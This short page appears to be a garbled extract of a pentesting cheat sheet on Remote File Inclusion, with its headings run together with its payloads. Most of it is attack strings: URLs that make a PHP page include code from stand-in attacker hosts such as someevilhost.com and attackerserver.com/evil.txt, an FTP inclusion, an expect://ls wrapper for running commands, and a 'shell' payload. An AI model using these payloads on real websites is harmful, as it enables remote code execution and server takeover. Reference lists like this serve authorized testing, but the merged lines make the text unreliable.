Remote File Inclusion (RFI)
Examples
Testing for RFI
<?php
echo "Hello";
?>Basic Exploitation
http://localhost/index.php?page=http://someevilhost.com/test.phpftp://10.10.10.1/AnyFile
expect://lsObtaining a Shell
http://acme.com/index.php?page=http://attackerserver.com/evil.txtNotes
References
Last updated